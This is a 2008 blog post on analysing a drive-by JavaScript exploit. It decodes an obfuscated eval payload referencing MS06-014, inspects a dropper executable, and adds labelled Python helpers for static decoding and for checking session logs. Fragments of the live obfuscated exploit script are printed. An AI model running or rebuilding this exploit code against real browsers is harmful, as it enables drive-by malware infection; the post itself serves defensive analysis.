14 January, 2008

JavaScript decoding and more

JavaScript obfuscation is pretty common. There are plenty of places to find out about how to reverse it along with basic malware analysis tips. Here is an example of obfuscated JavaScript I've seen. I will be posting a few malicious code examples in this entry, so caution is advised with any of the code or URLs. If you can avoid it, I also would suggest not downloading malicious content on your production network.

eval("\151\146\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\56\151\156\144\145\170\117\146\50\47\117\113\47\51\75\75\55\61\51\173\15\12\164\162\171\173\166\141\162\40\145\73\15\12\166\141\162\40\141\144\157\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\157\142\152\145\143\164\42\51\51\73\15\12\166\141\162\40\122\151\

-- snipped --

\157\162\135\42\40\46\46\40\151\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\15\12\173\15\12\154\157\143\141\164\151\157\156\56\162\145\160\154\141\143\145\50\42\141\142\157\165\164\72\142\154\141\156\153\42\51\73\175\15\12\175\175\175")
How do I figure out what this exploit attempt is doing? As pointed out on ISC, there are a number of ways to decode JavaScript. Remember the following caveat from the first link above:
For the first two methods mentioned, be mindful that you are actually running hostile code inside a potentially vulnerable web browser. Make sure to apply the usual precautions (VMWare or the like, deployed far away from any production network you might have, and keeping a keen eye on the firewall log, etc).
I chose the lazy method in this case. First, I downloaded the JavaScript file using wget. Then I made a copy, changing the file extension from .js to .html, added the script tag, and changed "eval" to "alert".
<script language=JavaScript>
alert("\151\146\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\56\151\156\144\145\1

-- snipped --

\157\165\164\72\142\154\141\156\153\42\51\73\175\15\12\175\175\175")
</script>
Now opening the file with a browser will show the decoded JavaScript. Please remember that the links and code in the below image are malicious and you visit them or run the code at your own risk.


There are a number of references to other scripts and files in the above code. There is also a further layer of obfuscation in the form of hexadecimal-encoded strings. There are a number of quick ways to convert the hexadecimal to ASCII, either online or with your programming language of choice. As examples, the hexadecimal of the "Rising" variable above translates to "classid", the "Kaspersky" variable represents a specific CLSID, and the "KV2008" variable translates to "Adodb.Stream". We also see a reference to MS06-014, and more.
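The eval-to-alert trick works, but it still runs the hostile script's string decoding inside a browser. As an added example (not code from the original post), the script below does the same octal/hex/unicode escape decoding statically in Python, pulls the string out of an eval("...") call, and also converts the plain hex strings found in the second layer. The eval sample is the first fragment of the post's own script; the hex strings are constructed here from the decoded values the post names, since the post does not show the raw hex.

```python
import re

# JavaScript string-escape decoder. The regex tries \xNN, \uNNNN, then an octal
# escape (\NNN where the value stays at or below \377, or one or two digits), then
# a single escaped character such as \n or \".
_ESCAPE_RE = re.compile(
    r"\\(?:x(?P<hex>[0-9A-Fa-f]{2})"
    r"|u(?P<uni>[0-9A-Fa-f]{4})"
    r"|(?P<oct>[0-3][0-7]{2}|[0-7]{1,2})"
    r"|(?P<chr>.))",
    re.DOTALL,
)

_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "v": "\v"}


def unescape_js(s: str) -> str:
    """Decode JavaScript escape sequences without evaluating any JavaScript."""
    def repl(m: re.Match) -> str:
        if m.group("hex"):
            return chr(int(m.group("hex"), 16))
        if m.group("uni"):
            return chr(int(m.group("uni"), 16))
        if m.group("oct"):
            return chr(int(m.group("oct"), 8))
        c = m.group("chr")
        return _SIMPLE_ESCAPES.get(c, c)   # \" \' \\ and unknown escapes map to themselves
    return _ESCAPE_RE.sub(repl, s)


# Matches eval("...") with a double-quoted literal; backslash-escaped quotes are allowed.
_EVAL_RE = re.compile(r'eval\(\s*"((?:[^"\\]|\\.)*)"\s*\)', re.DOTALL)


def decode_eval_payload(src: str):
    """Return the decoded argument of the first eval("...") in src, or None if absent."""
    m = _EVAL_RE.search(src)
    return unescape_js(m.group(1)) if m else None


def hex_to_ascii(h: str) -> str:
    """Decode a hex-encoded string (with or without 0x, \\x, % or whitespace separators)."""
    cleaned = re.sub(r"0x|\\x|%|[\s,]", "", h)
    return bytes.fromhex(cleaned).decode("latin-1")


# First fragment of the post's obfuscated script, embedded so this runs offline.
SAMPLE_EVAL = (
    r'eval("\151\146\50\144\157\143\165\155\145\156\164\56\143\157\157\153'
    r'\151\145\56\151\156\144\145\170\117\146\50\47\117\113\47\51\75\75\55'
    r'\61\51\173")'
)

# Constructed hex strings (hypothetical; built from the decoded values the post names).
SAMPLE_HEX_CLASSID = "636c6173736964"
SAMPLE_HEX_STREAM = "41646f64622e53747265616d"

if __name__ == "__main__":
    print(decode_eval_payload(SAMPLE_EVAL))
    print(hex_to_ascii(SAMPLE_HEX_CLASSID), hex_to_ascii(SAMPLE_HEX_STREAM))
```

Because nothing here is executed as JavaScript, the decoded text can be run on an analysis box without a browser in the loop; for nested layers, feed the output back through decode_eval_payload until no eval("...") remains.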

If you're using NSM with session data, you can see whether any systems that were subjected to the initial JavaScript exploit code then connected to any related sites after the exploit attempt, which could indicate the exploit succeeded. If you have full content packet captures, you can even see the data in the activity that followed.
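The session-data check described above, as an added example that is not part of the original post: given session records (timestamp, client, server name), list the clients that reached the page serving the obfuscated script and then, within a short window, connected to one of the hosts the decoded script references. The session lines and the host names (.invalid domains) are constructed for the example.

```python
from datetime import datetime, timedelta

# Constructed session records (not from the post): ISO timestamp, client IP, server name.
SESSIONS = """\
2008-01-14T10:00:01 10.0.0.5 landing.invalid
2008-01-14T10:00:03 10.0.0.5 payload.invalid
2008-01-14T10:00:05 10.0.0.7 landing.invalid
2008-01-14T10:00:09 10.0.0.9 payload.invalid
2008-01-14T10:30:00 10.0.0.7 payload.invalid
"""

# Hypothetical names: the host that served the obfuscated script, and the hosts
# the decoded script pulls further content from (the .cab file and friends).
LANDING_HOST = "landing.invalid"
RELATED_HOSTS = {"payload.invalid"}


def parse_sessions(text: str):
    """Parse the whitespace-separated session lines into sorted (time, client, server) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, server = line.split()
        rows.append((datetime.fromisoformat(ts), client, server))
    rows.sort()
    return rows


def find_followups(text: str, landing: str, related: set, window=timedelta(minutes=5)):
    """Clients that hit the landing page and then a related host within `window`.

    Returns (client, related_host, seconds_after_landing) tuples; a short delay is
    the pattern you would expect if the exploit succeeded and fetched its next stage.
    """
    first_exposure = {}   # client -> time of its first landing-page session
    hits = []
    for ts, client, server in parse_sessions(text):
        if server == landing:
            first_exposure.setdefault(client, ts)
        elif server in related and client in first_exposure:
            delta = ts - first_exposure[client]
            if timedelta(0) <= delta <= window:
                hits.append((client, server, int(delta.total_seconds())))
    return hits


def related_without_landing(text: str, landing: str, related: set):
    """Clients that reached a related host with no earlier landing-page session.

    These are worth a look too: either the landing page was missed by the sensor
    or the client got there by another route.
    """
    seen_landing = set()
    flagged = []
    for _, client, server in parse_sessions(text):
        if server == landing:
            seen_landing.add(client)
        elif server in related and client not in seen_landing and client not in flagged:
            flagged.append(client)
    return flagged


if __name__ == "__main__":
    for hit in find_followups(SESSIONS, LANDING_HOST, RELATED_HOSTS):
        print("possible success:", hit)
    print("related traffic without landing page:",
          related_without_landing(SESSIONS, LANDING_HOST, RELATED_HOSTS))
```

With the sample data, 10.0.0.5 fetched the related host two seconds after the landing page, 10.0.0.7 only did so half an hour later (outside the window, so it is not flagged), and 10.0.0.9 reached the related host without ever touching the landing page. Full content captures for the flagged sessions would then show what was actually transferred.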

I also decided to download some of the files to see what I was dealing with. The .cab file in particular looked interesting. I downloaded it using wget and then unpacked it using cabextract. This revealed an executable.
$ file cabfile.exe
cabfile.exe: MS-DOS executable, MZ for MS-DOS
I also took a quick look with the strings command, which had a few interesting lines.
$ strings -n 3 -a cabfile.exe | less
MZKERNEL32.DLL
LoadLibraryA
j'Y
GetProcAddress

-- snipped --

D:\FastDown\MHDropper\Release\MHDropper.pdb
The executable definitely doesn't look like a friendly file. Finally, the results from VirusTotal show that only 18 of the 32 engines detect it as malicious. I would say that 18 out of 32 is ineffective at best, especially considering that one large vendor's product did not detect the file as malicious.

This all goes to show that you can get a lot of information with fairly basic procedures. If anyone has a critique or interesting information to add, please post a comment.
